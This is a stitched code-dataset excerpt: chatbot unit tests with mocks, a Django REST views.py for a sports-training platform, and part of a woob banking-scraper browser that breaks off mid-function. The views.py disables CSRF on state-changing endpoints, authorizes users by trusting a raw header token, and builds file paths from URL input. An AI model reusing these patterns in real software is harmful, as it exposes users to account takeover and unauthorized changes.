},\n \n ]\n \n self.failure_test_params = [\n {\n KEY_INPUT: \"!! tamil-translate coconuts\",\n KEY_EXPECTED: \"my name is\"\n },\n \n ]\n self.error_tamil_translate_test_params = [\n {\n KEY_INPUT: \"!! 
tamil-translate\",\n KEY_EXPECTED: \"Error: text not given\" \n },\n ]\n \n \n self.success_test_text_to_binary = [\n {\n KEY_INPUT: \"!! text-to-binary hello\",\n KEY_EXPECTED: \"0110100001100101011011000110110001101111\" \n },\n ] \n \n self.success_random_fact= [\n {\n KEY_INPUT: \"!! random-fact\",\n KEY_EXPECTED: \"In a test performed by Canadian scientists, using various different styles of music, it was determined that chickens lay the most eggs when pop music was played.\" },\n ] \n \n #MOCKED TESTS\n def mocked_funtranslate_success(self,link, params):\n if link == \"https://api.funtranslations.com/translate/yoda.json\":\n dicts = {\"contents\": {\"translated\": \"Lost a planet, master obiwan has.\"}}\n return MockResponse(dicts, 200)\n \n def mocked_funtranslate_failure(self,link, params):\n dicts = {\"error\": {\"translated\": \"Lost a planet, master obiwan has.\"}}\n return MockResponse(dicts, 200)\n \n def mocked_text_to_binary_success(self,link, params):\n dicts = {'binary': '0110100001100101011011000110110001101111'}\n return MockResponse(dicts, 200) \n \n def mocked_random_fact_success(self,link):\n dicts = {'text': 'In a test performed by Canadian scientists, using various different styles of music, it was determined that chickens lay the most eggs when pop music was played.'}\n return MockResponse(dicts, 200) \n \n def mocked_add_to_db_and_emit(self, text): \n print(\"here\")\n \n def mocked_db(self):\n mocked_db = UnifiedAlchemyMagicMock()\n return mocked_db\n #----------------------------------------------------------------- \n def test_funtranslate_success(self):\n for test_case in self.success_test_funtranslate:\n with mock.patch('requests.get', self.mocked_funtranslate_success):\n funtranslate = bot_response_api(test_case[KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(funtranslate, expected)\n \n def test_funtranslate_failure(self):\n for test_case in self.failure_test_funtranslate:\n with mock.patch('requests.get', self.mocked_funtranslate_failure):\n funtranslate = bot_response_api(test_case[KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(funtranslate, expected)\n \n def test_text_to_binary_success(self):\n for test_case in self.success_test_text_to_binary:\n with mock.patch('requests.get', self.mocked_text_to_binary_success):\n text_to_binary = bot_response_api(test_case[KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(text_to_binary, expected)\n \n def test_random_fact_success(self):\n for test_case in self.success_random_fact:\n with mock.patch('requests.get', self.mocked_random_fact_success):\n text_to_binary = bot_response_api(test_case[KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(text_to_binary, expected)\n \n #__________________________________________________________________________________________ \n #__________________________________________________________________________________________\nclass SQLObject:\n def __init__(self, message):\n self.message = message\n \nclass Table:\n def __init__(self, message):\n return\n def all(self):\n return [SQLObject(\"test message\")]\n \nclass SessionObject:\n def __init__(self):\n return\n def add(self, table):\n return\n def commit(self): \n return\n def query(self, message):\n return Table(message)\n \nclass db_Test(unittest.TestCase):\n def setUp(self):\n self.success_add_to_db = [\n {\n KEY_INPUT:\"hello\",\n KEY_EXPECTED: None\n },\n ] \n \n def test_database_success(self):\n for test_case in self.success_add_to_db:\n with 
mock.patch('app.db.session', SessionObject()):\n response = add_to_db_and_emit(test_case[KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected)\n \nclass DBObject:\n def __init__(self):\n return\n def init_app(self, app):\n return\n def app(self):\n return\n def create_all(self):\n return \n def session(self):\n return DBObjectSession()\n \nclass db_Initialize(unittest.TestCase):\n def setUp(self):\n self.success_initialize_db = [\n {\n KEY_EXPECTED: None\n },\n ] \n \n def test_database_initialization(self):\n for test_case in self.success_initialize_db:\n with mock.patch('app.db', DBObject()):\n with mock.patch('app.db.session', SessionObject()):\n response = init_db(app)\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected)\n #__________________________________________________________________________________________ \n #__________________________________________________________________________________________\nclass emit_all_test(unittest.TestCase):\n def setUp(self):\n self.success_emit_all = [\n {\n KEY_INPUT:[\"test channel\", \"test_sid\"],\n KEY_EXPECTED: None\n },\n ] \n \n def test_emit_all(self):\n for test_case in self.success_emit_all:\n with mock.patch('app.db.session', SessionObject()):\n channel = test_case[KEY_INPUT][0]\n sid = channel = test_case[KEY_INPUT][1]\n response = emit_all_from_database(channel,sid)\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected) \n#__________________________________________________________________________________________ \n#__________________________________________________________________________________________\n\nclass FlaskObj:\n def __init__(self):\n return\n def render_template(self, html):\n return html\n \nclass render_template_test(unittest.TestCase):\n def setUp(self):\n self.success_render_template = [\n {\n #KEY_INPUT:[\"test channel\", \"test_sid\"],\n KEY_EXPECTED: \"index.html\"\n },\n ] \n \n def test_render_template(self):\n for test_case in self.success_render_template:\n with mock.patch('app.flask', FlaskObj()):\n response = hello()\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected) \n#__________________________________________________________________________________________ \n#__________________________________________________________________________________________\n\nclass RequestObj:\n def __init__(self):\n return\n def sid(self):\n return \"test_sid\"\n \nclass new_google_user_test(unittest.TestCase):\n def setUp(self):\n self.success_google_user = [\n {\n KEY_INPUT:{\"name\":\"test data\"},\n KEY_EXPECTED: None\n },\n ] \n def emit_all_from_db(self, channel, sid):\n return None\n def test_render_template(self):\n for test_case in self.success_google_user:\n with mock.patch('app.request', RequestObj()):\n with mock.patch('app.db.session', SessionObject()):\n response = on_new_google_user(test_case[ KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected) \n#__________________________________________________________________________________________ \n#__________________________________________________________________________________________\nclass new_data_test(unittest.TestCase):\n def setUp(self):\n self.success_new_data = [\n {\n KEY_INPUT:{\"new message\":\"test message\"},\n KEY_EXPECTED: None\n },\n {\n KEY_INPUT:{\"new message\":\"!! 
about\"},\n KEY_EXPECTED: None\n },\n ] \n def add_to_db_and_emit(self, msg):\n return None\n def test_new_message(self):\n for test_case in self.success_new_data:\n with mock.patch('app.request', RequestObj()):\n with mock.patch('app.db.session', SessionObject()):\n \n response = on_new_data(test_case[ KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected)\n \n \n \n \n\nif __name__ == '__main__':\n unittest.main()","repo_name":"AaratiS12/ChatBot","sub_path":"tests/mocked_unit_test.py","file_name":"mocked_unit_test.py","file_ext":"py","file_size_in_byte":10589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17173942935","text":"from rest_framework import viewsets\nfrom .serializers import TodoSerializer\nfrom django.views import View\nimport os\nfrom rest_framework.parsers import MultiPartParser, FormParser, JSONParser, FileUploadParser\nfrom templated_email import send_templated_mail\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django_filters.rest_framework import DjangoFilterBackend, filters\nfrom rest_framework import permissions\nfrom rest_framework.permissions import IsAdminUser\nimport django_filters\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.generics import RetrieveUpdateAPIView\nfrom rest_framework.mixins import UpdateModelMixin\nfrom rest_framework import generics\nfrom rest_framework.authtoken.models import Token\nimport json\nfrom django.db.models import F\nfrom django.http import HttpResponse, HttpRequest, HttpResponseNotFound\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.mail import send_mail\nfrom inspect import getmembers\nfrom pprint import pprint\nimport string\nimport random\nimport uuid\n\nfrom django.contrib.auth.models import User\n\nfrom .models import Post, EventRegistration, Profile, VerificationKey, TrainingGroup, Todo\nfrom .serializers import (TrainingSerializer, ProfileSerializer, ResetPasswordEmailRequestSerializer,\n EventRegistrationSerializer, VerificationKeySerializer, TrainingGroupSerializer)\n\nfrom django.views.decorators.csrf import csrf_exempt\n\nclass TodoView(viewsets.ModelViewSet):\n serializer_class = TodoSerializer\n queryset = Todo.objects.all()\n\n\nclass Assets(View):\n\n def get(self, _request, filename):\n path = os.path.join(os.path.dirname(__file__), 'static', filename)\n\n if os.path.isfile(path):\n with open(path, 'rb') as file:\n return HttpResponse(file.read(), content_type='application/javascript')\n else:\n return HttpResponseNotFound()\n\n\nclass CoachTrainingCreatePermission(permissions.BasePermission):\n def has_permission(self, request, view):\n token = request.META['HTTP_AUTHORIZATION']\n print('TokeN', token)\n user = Profile.objects.get(pk=token)\n coach = user.is_coach\n return coach\n\n\nclass TrainingViewSet(viewsets.ModelViewSet):\n serializer_class = TrainingSerializer\n queryset = Post.objects.all()\n\n\n# from rest_framework.generics import (\n# ListAPIView,\n# RetrieveAPIView,\n# CreateAPIView,\n# DestroyAPIView,\n# UpdateAPIView,\n# )\n\n\nfrom rest_framework.permissions import IsAdminUser\n\n\n# class TrainingListView(ListAPIView):\n# queryset = Post.objects.all()\n# serializer_class = TrainingSerializer\n#\n#\n# class TrainingDetailView(RetrieveAPIView):\n# queryset = Post.objects.all()\n# serializer_class = 
TrainingSerializer\n#\n#\n# class TrainingCreateView(CreateAPIView):\n# queryset = Post.objects.all()\n# serializer_class = TrainingSerializer\n# permission_classes = [IsAdminUser]\n#\n#\n# class TrainingUpdateView(UpdateAPIView):\n# queryset = Post.objects.all()\n# serializer_class = TrainingSerializer\n#\n#\n# class TrainingDeleteView(DestroyAPIView):\n# queryset = Post.objects.all()\n# serializer_class = TrainingSerializer\n\n@csrf_exempt\ndef event_add_attendance(request, pk):\n print('request method', request.method)\n if request.method == \"POST\":\n data = json.loads(request.body)\n print(data['pk'], data['profile'], data['organizeremail'])\n trainingtitle = data['trainingtitle']\n trainingdate = data['trainingdate']\n training_starttime = data['training_start_time']\n training_endtime = data['training_end_time']\n training_sport = data['training_sport']\n event_time = data['eventtime']\n event_date = data['eventdate']\n registration_time = data['registration_time']\n name = data['name']\n email = data['email']\n organizeremail = data['organizeremail']\n profilePK = data['profile']\n profile = Profile.objects.get(pk=profilePK)\n pk = data['pk']\n training = Post.objects.get(pk=pk)\n print('Saadud treening', training)\n training.registrations_made = F('registrations_made') + 1\n training.save()\n training.add_user_to_list_of_attendees(profile=profile, pk=training.pk, event_time=event_time,\n event_date=event_date)\n if_send_email = training.send_registrations\n if if_send_email:\n send_templated_mail(\n template_name='welcome',\n from_email='fitexsport.info@gmail.com',\n recipient_list=[organizeremail],\n context={\n 'email': email,\n 'name': name,\n 'trainingtitle': trainingtitle,\n 'trainingsdate': trainingdate,\n 'training_starttime': training_starttime,\n 'training_endtime': training_endtime,\n 'registrationtime': registration_time,\n 'sport': training_sport,\n },\n )\n return HttpResponse(status=200)\n\n\n@csrf_exempt\ndef group_add_user_to_requesting(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n group_id = data['groupID']\n group = TrainingGroup.objects.get(pk=group_id)\n profile_id = data['token']\n profile = Profile.objects.get(pk=profile_id)\n group.add_user_to_requesting(profile)\n return redirect('/api/')\n\n\n@csrf_exempt\ndef add_user_to_group(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n group_id = data['groupID']\n group = TrainingGroup.objects.get(pk=group_id)\n profile_id = data['token']\n profile = Profile.objects.get(pk=profile_id)\n group.add_user_to_group(profile)\n profile.add_group(group)\n group.members_count = F('members_count') + 1\n return redirect('/api')\n\n\n@csrf_exempt\ndef remove_user_from_requesting(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n group_id = data['groupID']\n group = TrainingGroup.objects.get(pk=group_id)\n profile_id = data['token']\n profile = Profile.objects.get(pk=profile_id)\n group.remove_user_from_requesting(profile)\n return redirect('/api/')\n\n\n@csrf_exempt\ndef send_verification_email(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n email = data['email']\n username = data['username']\n token = data['token']\n send_templated_mail(\n template_name='verification',\n from_email='fitexsport.info@gmail.com',\n recipient_list=[email],\n context={\n 'token': token,\n 'username': username,\n },\n )\n return redirect('/api')\n\n\ndef event_cancel_attendance(request, pk):\n this_event = 
Post.objects.get(pk=pk)\n this_event.remove_user_from_list_of_attendees(user=request.user, pk=this_event.pk)\n return redirect('/' + str(this_event.pk))\n\n\n@csrf_exempt\ndef send(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n trainingtitle = data['trainingtitle']\n name = data['name']\n email = data['email']\n organizeremail = data['organizeremail']\n send_templated_mail(\n template_name='welcome',\n from_email='fitexsport.info@gmail.com',\n recipient_list=[organizeremail],\n context={\n 'email': email,\n 'name': name,\n 'trainingtitle': trainingtitle,\n },\n )\n return redirect('/api/')\n\n\n@csrf_exempt\ndef admin_login(request):\n if request.method == 'POST':\n data = json.loads(request.body)\n token = data['token']\n user = Profile.objects.get(pk=token)\n is_admin = user.is_admin\n print('is_admin', is_admin)\n if is_admin:\n return HttpResponse(status=200)\n else:\n return HttpResponse(status=401)\n\n\nclass ProfileCreateView(generics.CreateAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n\n\nclass ProfileListView(generics.ListAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n\n\nclass ProfileView(generics.RetrieveAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n\n# view to check if user has account assigned to that certain email\n\nclass ProfileViewByEmail(generics.RetrieveAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n lookup_field = 'email'\n lookup_url_kwarg = 'pk'\n\n# check if logged in user is connected to profile that he/she tries to update\n\n\nclass UserProfileUpdatePermission(permissions.BasePermission):\n def has_object_permission(self, request, view, obj):\n print('kwargs', obj.token)\n token = request.META['HTTP_AUTHORIZATION']\n object_token = obj.token\n if token is not None and token == object_token:\n return True\n else:\n return False\n\n\nclass ProfileViewUpdate(generics.UpdateAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n parser_classes = (MultiPartParser, FormParser, FileUploadParser)\n permission_classes = [UserProfileUpdatePermission]\n\n\nclass ProfileViewPartialUpdate(APIView):\n parser_classes = (MultiPartParser, FormParser, FileUploadParser)\n\n def patch(self, request, *args, **kwargs):\n serializer = ProfileSerializer(data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n print('error', serializer.errors)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass RequestPasswordResetEmail(generics.GenericAPIView):\n serializer_class = ResetPasswordEmailRequestSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n\nclass CoachProfileView(generics.RetrieveAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n lookup_field = 'username'\n lookup_url_kwarg = 'pk'\n\n\nclass EventRegistrationsView(generics.ListAPIView):\n queryset = EventRegistration.objects.all()\n serializer_class = EventRegistrationSerializer\n\n def get_queryset(self):\n eventid = self.kwargs['pk']\n return EventRegistration.objects.filter(event=eventid)\n\n\nclass EventRegistrationsListView(generics.ListAPIView):\n queryset = 
EventRegistration.objects.all()\n serializer_class = EventRegistrationSerializer\n\n def get_queryset(self):\n userid = self.kwargs['pk']\n return EventRegistration.objects.filter(profile=userid)\n\n filter_backends = [DjangoFilterBackend]\n filterset_fields = {'event_date': ['gte', 'lte']}\n\n\n# if user registers via email, send verification token to their email\n@csrf_exempt\ndef generate_and_send_verification_token(request):\n if request.method == \"POST\":\n data = json.loads(request.body)\n email = data['email']\n userName = data['username']\n def token_generator(string_length=7):\n \"\"\"Returns a random string of length string_length.\"\"\"\n random = str(uuid.uuid4()) # Convert UUID format to a Python string.\n random = random.upper() # Make all characters uppercase.\n random = random.replace(\"-\",\"\") # Remove the UUID '-'.\n return random[0:string_length] # Return the random string.\n user_token = token_generator()\n print('userToken', user_token)\n VerificationKey.objects.create(useremail=email, token=user_token)\n send_templated_mail(\n template_name='verification',\n from_email='fitexsport.info@gmail.com',\n recipient_list=[email],\n context={\n 'token': user_token,\n 'username': userName,\n },\n )\n return HttpResponse(status=200)\n\n# chechk if user has entered correct verification key for verifying their email\n@csrf_exempt\ndef check_user_verification_key(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n userEmail = pk\n key = data['key']\n user_profile = VerificationKey.objects.get(useremail=userEmail)\n user_key = user_profile.token\n if key == user_key:\n return HttpResponse(status=200)\n else:\n return HttpResponse(status=403)\n\nclass VerificationKeyCreateView(generics.CreateAPIView):\n queryset = VerificationKey.objects.all()\n serializer_class = VerificationKeySerializer\n\n\nclass VerificationKeyRetrieve(generics.RetrieveAPIView):\n queryset = VerificationKey.objects.all()\n serializer_class = VerificationKeySerializer\n\n lookup_field = 'useremail'\n lookup_url_kwarg = 'pk'\n\n\nclass VerificationKeyRetrieveByToken(generics.RetrieveAPIView):\n queryset = VerificationKey.objects.all()\n serializer_class = VerificationKeySerializer\n\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n\n\nclass VerificationKeyUpdate(generics.UpdateAPIView):\n queryset = VerificationKey.objects.all()\n serializer_class = VerificationKeySerializer\n lookup_field = 'useremail'\n lookup_url_kwarg = 'pk'\n\n\nclass VerificationKeyDelete(generics.DestroyAPIView):\n queryset = VerificationKey.objects.all()\n serializer_class = VerificationKeySerializer\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n\n\nclass CoachTrainingsListView(generics.ListAPIView):\n queryset = Post.objects.all()\n serializer_class = TrainingSerializer\n\n def get_queryset(self):\n coachid = self.kwargs['pk']\n return Post.objects.filter(coach=coachid)\n\n\nclass TrainingListResultsPagination(PageNumberPagination):\n page_size = 10\n page_size_query_param = 'page_size'\n max_page_size = 1000\n\n# TrainingsList is trainings list that user sees\n\n\nclass TrainingsListView(generics.ListAPIView):\n queryset = Post.objects.all()\n serializer_class = TrainingSerializer\n filter_backends = [DjangoFilterBackend]\n filterset_fields = {'stringdate': ['gte'], 'sport': ['exact'], 'city': ['exact'], 'stringtime2': ['exact'],\n 'organizername': ['exact'], 'group_id': ['exact'], 'group': ['exact'], 'coach': ['exact']}\n pagination_class = TrainingListResultsPagination\n\n\nclass 
TrainingUpdateView(generics.GenericAPIView, UpdateModelMixin):\n queryset = Post.objects.all()\n serializer_class = TrainingSerializer\n\n def patch(self, request, *args, **kwargs):\n return self.partial_update(request, *args, **kwargs)\n\n\nclass TrainingGroupCreateView(generics.CreateAPIView):\n queryset = TrainingGroup.objects.all()\n serializer_class = TrainingGroupSerializer\n\n\nclass CoachTrainingGroupListView(generics.ListAPIView):\n queryset = TrainingGroup.objects.all()\n serializer_class = TrainingGroupSerializer\n\n def get_queryset(self):\n coachtoken = self.kwargs['pk']\n return TrainingGroup.objects.filter(coach=coachtoken)\n\n\nclass TrainingGroupRetrieveView(generics.RetrieveAPIView):\n queryset = TrainingGroup.objects.all()\n serializer_class = TrainingGroupSerializer\n\n lookup_field = 'id'\n lookup_url_kwarg = 'pk'\n\n\nclass TrainingGroupDetailUpdate(generics.UpdateAPIView):\n queryset = TrainingGroup.objects.all()\n serializer_class = TrainingGroupSerializer\n lookup_field = 'id'\n lookup_url_kwarg = 'pk'\n parser_classes = (MultiPartParser, FormParser, FileUploadParser)\n\n\nclass TrainingGroupListPagination(PageNumberPagination):\n page_size = 10\n page_size_query_param = 'page_size'\n max_page_size = 1000\n\n\nclass TrainingGroupListView(generics.ListAPIView):\n queryset = TrainingGroup.objects.all()\n serializer_class = TrainingGroupSerializer\n filter_backends = [DjangoFilterBackend]\n filterset_fields = {'sport': ['exact'], 'location': ['exact'], 'coach_name': ['exact'], 'name': ['exact']}\n pagination_class = TrainingGroupListPagination\n\n\nclass GroupMemberRetrieve(generics.ListAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n\n\nclass AdminPermission(permissions.BasePermission):\n def has_permission(self, request, view):\n token = request.META['HTTP_AUTHORIZATION']\n print('TokeN', token)\n user = Profile.objects.get(pk=token)\n admin = user.is_admin\n return admin\n\n\nclass UserListResultsPagination(PageNumberPagination):\n page_size = 5\n page_size_query_param = 'page_size'\n max_page_size = 10000\n\n\nclass UsersListView(generics.ListAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n permission_classes = [AdminPermission] # allows only admins to access users list\n filter_backends = [DjangoFilterBackend]\n\n pagination_class = UserListResultsPagination\n\n filterset_fields = {'email': ['exact'], 'is_coach': ['exact'], 'is_athlete': ['exact']}\n\n\nclass UserStatusUpdate(generics.UpdateAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n permission_classes = [AdminPermission]\n\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n\n","repo_name":"austinroose/FitexSport","sub_path":"fitex/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3966868766","text":"import re\nimport time\nfrom collections import Counter\nfrom fnmatch import fnmatch\nfrom urllib.parse import urlparse\n\nfrom requests import HTTPError, TooManyRedirects\n\nfrom woob.browser import need_login\nfrom woob.browser.url import URL\nfrom woob.browser.exceptions import ClientError\nfrom woob.exceptions import BrowserIncorrectPassword, BrowserUnavailable\nfrom woob.capabilities.base import find_object\nfrom woob.tools.capabilities.bank.transactions import (\n sorted_transactions, 
omit_deferred_transactions, keep_only_card_transactions,\n)\nfrom woob.tools.json import json\nfrom woob_modules.linebourse.browser import LinebourseAPIBrowser\n\nfrom .pages import (\n CenetLoginPage, CenetHomePage,\n CenetAccountsPage, CenetAccountHistoryPage, CenetCardsPage,\n CenetCardSummaryPage, SubscriptionPage, DownloadDocumentPage,\n CenetLoanPage, LinebourseTokenPage,\n)\nfrom ..browser import CaisseEpargneLogin\nfrom ..pages import CaissedepargneKeyboard\n\n\n__all__ = ['CenetBrowser']\n\n\nclass CenetBrowser(CaisseEpargneLogin):\n BASEURL = \"https://www.cenet.caisse-epargne.fr\"\n\n SKIP_LOCATE_BROWSER_ON_CONFIG_VALUES = ('otp_sms',)\n STATE_DURATION = 5\n\n cenet_vk = URL(r'https://www.cenet.caisse-epargne.fr/Web/Api/ApiAuthentification.asmx/ChargerClavierVirtuel')\n cenet_home = URL(\n r'/Default.aspx$',\n r'/default.aspx$',\n CenetHomePage\n )\n cenet_accounts = URL(r'/Web/Api/ApiComptes.asmx/ChargerSyntheseComptes', CenetAccountsPage)\n cenet_market_accounts = URL(r'/Web/Api/ApiBourse.asmx/ChargerComptesTitres', CenetAccountsPage)\n cenet_loans = URL(r'/Web/Api/ApiFinancements.asmx/ChargerListeFinancementsMLT', CenetLoanPage)\n cenet_account_history = URL(r'/Web/Api/ApiComptes.asmx/ChargerHistoriqueCompte', CenetAccountHistoryPage)\n cenet_account_coming = URL(r'/Web/Api/ApiCartesBanquaires.asmx/ChargerEnCoursCarte', CenetAccountHistoryPage)\n cenet_tr_detail = URL(r'/Web/Api/ApiComptes.asmx/ChargerDetailOperation', CenetCardSummaryPage)\n cenet_cards = URL(r'/Web/Api/ApiCartesBanquaires.asmx/ChargerCartes', CenetCardsPage)\n cenet_login = URL(\n r'https://.*/$',\n r'https://.*/default.aspx',\n CenetLoginPage,\n )\n linebourse_token = URL(r'/Web/Api/ApiBourse.asmx/GenererJeton', LinebourseTokenPage)\n\n subscription = URL(r'/Web/Api/ApiReleves.asmx/ChargerListeEtablissements', SubscriptionPage)\n documents = URL(r'/Web/Api/ApiReleves.asmx/ChargerListeReleves', SubscriptionPage)\n download = URL(r'/Default.aspx\\?dashboard=ComptesReleves&lien=SuiviReleves', DownloadDocumentPage)\n\n LINEBOURSE_BROWSER = LinebourseAPIBrowser\n MARKET_URL = 'https://www.caisse-epargne.offrebourse.com'\n\n def __init__(self, *args, **kwargs):\n # This value is useful to display deferred transactions if PSU has no card but only CHECKING account\n self.has_cards_displayed = False\n super(CenetBrowser, self).__init__(*args, **kwargs)\n\n dirname = self.responses_dirname\n if dirname:\n dirname += '/bourse'\n\n self.linebourse = self.LINEBOURSE_BROWSER(\n self.MARKET_URL,\n logger=self.logger,\n responses_dirname=dirname,\n woob=self.woob,\n proxy=self.PROXIES,\n )\n\n def deinit(self):\n super(CenetBrowser, self).deinit()\n self.linebourse.deinit()\n\n def set_base_url(self):\n self.BASEURL = self.CENET_URL\n\n def locate_browser(self, state):\n # parent's behavior\n if self.should_skip_locate_browser():\n return\n\n # otherwise, force going on home to avoid some bugs on other URL GET requests.\n try:\n self.cenet_home.go()\n except (HTTPError, TooManyRedirects):\n pass\n\n def do_login(self):\n if self.API_LOGIN:\n self.browser_switched = True\n # We use CaisseEpargneLogin do_login\n # browser_switched avoids to switch again\n super(CenetBrowser, self).do_login()\n\n # when we use CaisseEpargneLogin do_login we should reset the\n # value of BASEURL to CENET_URL (changed in login_finalize()-CaisseEpargneLogin).\n self.set_base_url()\n return\n\n data = self.login.go(login=self.username).get_response()\n\n if len(data['account']) > 1:\n # additional request where there is more than one\n # 
connection type (called typeAccount)\n # TODO: test all connection type values if needed\n account_type = data['account'][0]\n self.account_login.go(login=self.username, accountType=account_type)\n data = self.page.get_response()\n\n if data is None:\n raise BrowserIncorrectPassword()\n elif not self.nuser:\n raise BrowserIncorrectPassword(\"Erreur: Numéro d'utilisateur requis.\")\n\n if data.get('authMode') == 'redirectArrimage' and self.BASEURL in data['url']:\n # The login authentication is the same than non cenet user\n self.browser_switched = True\n super(CenetBrowser, self).do_login()\n\n # when we use CaisseEpargneLogin do_login we should reset the\n # value of BASEURL to CENET_URL (changed in login_finalize()-CaisseEpargneLogin).\n self.set_base_url()\n return\n elif data.get('authMode') != 'redirect':\n raise BrowserIncorrectPassword()\n\n payload = {'contexte': '', 'dataEntree': None, 'donneesEntree': \"{}\", 'filtreEntree': \"\\\"false\\\"\"}\n res = self.cenet_vk.open(data=json.dumps(payload), headers={'Content-Type': \"application/json\"})\n content = json.loads(res.text)\n d = json.loads(content['d'])\n end = json.loads(d['DonneesSortie'])\n\n _id = end['Identifiant']\n vk = CaissedepargneKeyboard(end['Image'], end['NumerosEncodes'])\n code = vk.get_string_code(self.password)\n\n post_data = {\n 'CodeEtablissement': data['codeCaisse'],\n 'NumeroBad': self.username,\n 'NumeroUtilisateur': self.nuser,\n }\n\n self.location(data['url'], data=post_data, headers={'Referer': 'https://www.cenet.caisse-epargne.fr/'})\n\n return self.page.login(self.username, self.password, self.nuser, data['codeCaisse'], _id, code)\n\n @need_login\n def go_linebourse(self):\n data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': 'null',\n 'filtreEntree': None,\n }\n try:\n self.linebourse_token.go(json=data)\n except BrowserUnavailable:\n # The linebourse space is not available on every connection\n raise AssertionError('No linebourse space')\n linebourse_token = self.page.get_token()\n\n self.location(\n self.absurl('/ReroutageSJR', self.MARKET_URL),\n data={'SJRToken': linebourse_token},\n )\n self.linebourse.session.cookies.update(self.session.cookies)\n domain = urlparse(self.url).netloc\n self.linebourse.session.headers['X-XSRF-TOKEN'] = self.session.cookies.get('XSRF-TOKEN', domain=domain)\n\n @need_login\n def get_accounts_list(self):\n if self.accounts is None:\n data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': 'null',\n 'filtreEntree': None,\n }\n\n # get accounts from CenetAccountsPage\n try:\n self.accounts = list(self.cenet_accounts.go(json=data).get_accounts())\n except ClientError:\n # Unauthorized due to wrongpass\n raise BrowserIncorrectPassword()\n\n # get cards, and potential missing card's parent accouts from CenetCardsPage\n try:\n self.cenet_cards.go(json=data)\n except BrowserUnavailable:\n # for some accounts, the site can throw us an error, during weeks\n self.logger.warning('ignoring cards because site is unavailable...')\n else:\n if not self.accounts:\n shallow_parent_accounts = list(self.page.iter_shallow_parent_accounts())\n if shallow_parent_accounts:\n self.logger.info('Found shallow parent account(s)): %s' % shallow_parent_accounts)\n self.accounts.extend(shallow_parent_accounts)\n\n cards = list(self.page.iter_cards())\n if cards:\n self.has_cards_displayed = True\n redacted_ids = Counter(card.id[:4] + card.id[-6:] for card in cards)\n for redacted_id in redacted_ids:\n assert redacted_ids[redacted_id] == 1, 'there are several cards 
with the same id %r' % redacted_id\n\n for card in cards:\n card.parent = find_object(self.accounts, id=card._parent_id)\n assert card.parent, 'no parent account found for card %s' % card\n self.accounts.extend(cards)\n\n # get loans from CenetLoanPage\n self.cenet_loans.go(json=data)\n for account in self.page.get_accounts():\n self.accounts.append(account)\n\n # get market accounts from market_accounts page\n self.cenet_market_accounts.go(json=data)\n market_accounts = list(self.page.get_accounts())\n if market_accounts:\n linebourse_account_ids = {}\n try:\n if any(account._access_linebourse for account in market_accounts):\n self.go_linebourse()\n params = {'_': '{}'.format(int(time.time() * 1000))}\n self.linebourse.account_codes.go(params=params)\n if self.linebourse.account_codes.is_here():\n linebourse_account_ids = self.linebourse.page.get_accounts_list()\n except AssertionError as e:\n if str(e) != 'No linebourse space':\n raise e\n finally:\n self.cenet_home.go()\n for account in market_accounts:\n for linebourse_id in linebourse_account_ids:\n if account.id in linebourse_id:\n account._is_linebourse = True\n self.accounts.append(account)\n return self.accounts\n\n def get_loans_list(self):\n return []\n\n def _matches_card(self, tr, full_id):\n return fnmatch(full_id, tr.card)\n\n def has_no_history(self, account):\n return account.type in (account.TYPE_LOAN, account.TYPE_SAVINGS)\n\n @need_login\n def get_history(self, account):\n if self.has_no_history(account):\n return []\n\n if getattr(account, '_is_linebourse', False):\n try:\n self.go_linebourse()\n return self.linebourse.iter_history(account.id)\n finally:\n self.cenet_home.go()\n\n if account.type == account.TYPE_CARD:\n if not account.parent._formated and account._hist:\n # this is a card account with a shallow parent\n return []\n else:\n # this is a card account with data available on the parent\n def 